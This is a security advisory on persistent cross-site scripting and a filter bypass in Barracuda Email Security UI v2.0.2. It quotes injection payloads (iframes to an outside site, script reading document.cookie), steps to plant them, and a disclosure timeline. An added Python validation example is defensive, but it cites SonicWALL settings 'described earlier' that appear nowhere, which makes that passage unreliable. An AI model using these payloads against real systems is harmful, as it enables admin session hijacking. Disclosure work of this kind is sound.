Vulnerability-Lab has discovered a filter bypass vulnerability & two persistent input validation vulnerabilities in Barracuda's Email Security Application UI v2.0.2.

The vulnerability allows a remote attacker to bypass the input validation & exception handling to inject or display their own malicious persistent content on the application side (persistent).

The vulnerabilities are located in the Domain Settings > Directory Services > LDAP Host module with the bound vulnerable name parameter. The second persistent vulnerability is located in the reports module with the bound vulnerable start date & end date parameters.

Exploitation requires low user interaction & a privileged application user account. Successful exploitation can lead to session hijacking (admin) or stable (persistent) context manipulation.

Vulnerability-Lab provided us with the proof-of-concept for the two vulnerabilities. Here it is:

PoC for the first vulnerability:

Review: Domain Settings > Directory Services > LDAP Host

<div id="directory-services" class="module">
<h4 class="module-title">Directory Services</h4>
<div class="module-content">
<div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="http://global-evolution.info">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
<div style="float: right;">
<a href="https://ess.barracudanetworks.com/domains/sync_ldap/4&quot; class="btn"><span><span>Synchronize Now</span></span></a>
<a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
</div>
<p class="field">
<label class="label" for="ldap_host">LDAP Host:</label>
<input name="ldap_host" id="ldap_host" size="30" value=">
"<iframe src=http://global-evolution.info>@gmail.com >"<script>alert(document.cookie)</script><
div style="1@gmail.com 0" type="text">

URL: https://ess.127.0.0.1:1338/domains/info/4

PoC: >">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"

Note:
To bypass the validation, close the tag of the exception handling at the beginning with double quotes twice.
The mask of the exception (>") is bypassed and the string is executed outside of the secure exception-handling message.

PoC for the second vulnerability:
The persistent web vulnerability can be exploited by remote attackers with a privileged user account & low user interaction.
For demonstration or to reproduce ...

Vulnerable Module: Reports > Date Start > Date End

PoC: >"<iframe src=http://global-evolution.info>

URL: https://ess.127.0.0.1:1338/reports

Note:
1. Enter a start date & end date.
2. Inject your own persistent script code after the start date & end date.
3. Result: the script code gets executed outside of the date listing application context.
4. Save the value with the script code to events for exploitation via the module.
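The note on the first PoC explains why a 'mask' that blanks the `>"` sequence fails: it edits the string instead of deciding whether the string is a hostname at all. As an added example, not Barracuda's code, the Python below validates the LDAP Host, the report start/end dates and, for the SonicWALL numeric settings such as floodMsgThreshold described earlier on this page, integer thresholds, by parsing each value as its expected type and rejecting everything else; `mask_filter` is included only to show what a bypassed mask leaves behind. Function names, limits and sample inputs are this example's own, except for the PoC string quoted from the advisory.

```python
import re
from datetime import date

# One DNS label: 1-63 chars of letters, digits or '-', not starting or ending with '-'
HOSTNAME_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# The LDAP Host PoC string quoted in the advisory above, used here only as a rejected input
POC_LDAP_HOST = '>">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"'


def validate_ldap_host(value: str) -> str:
    """Accept a hostname made of valid labels (an IPv4 literal passes the same test)."""
    host = value.strip().rstrip(".")
    if not host or len(host) > 253:
        raise ValueError("empty or too long")
    if not all(HOSTNAME_LABEL.fullmatch(label) for label in host.split(".")):
        raise ValueError(f"not a hostname: {value!r}")
    return host


def validate_report_date(value: str) -> date:
    """Parse a report date as ISO YYYY-MM-DD; anything else raises ValueError."""
    return date.fromisoformat(value.strip())


def validate_threshold(value: str, lo: int = 0, hi: int = 1_000_000) -> int:
    """Numeric appliance settings are integers, so parse them as integers and
    range-check; the bounds are assumptions for this example."""
    n = int(value.strip())   # ValueError for anything that is not an integer
    if not lo <= n <= hi:
        raise ValueError(f"threshold {n} outside {lo}..{hi}")
    return n


def mask_filter(value: str) -> str:
    """The kind of masking the note describes: blanking one pattern. Kept here only
    to contrast with typed validation; it is not a fix."""
    return value.replace('>"', "")


def accepted(validator, value: str) -> bool:
    """True if the validator returns normally for the value."""
    try:
        validator(value)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print(mask_filter(POC_LDAP_HOST))                       # tag survives the mask
    print(accepted(validate_ldap_host, POC_LDAP_HOST))      # False: not a hostname
    print(accepted(validate_ldap_host, "ldap.corp.example.com"))
    print(accepted(validate_report_date, "2012-06-20"))
    print(accepted(validate_threshold, "200<iframe"))       # False
```

Each validator returns a typed value (str, date, int) rather than a cleaned string, so downstream code never handles the raw input at all; the masked string, by contrast, still contains the iframe tag.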

2012-06-20: Researcher Notification & Coordination
2012-06-23: Vendor Notification
2012-07-01: Vendor Response/Feedback
2012-07-24: Vendor Fix/Patch
2012-08-01: Public or Non-Public Disclosure

The researcher estimates the vulnerability risk level as medium. Vulnerability-Lab informed the vendor, which patched the vulnerability and released BESS version 2.04.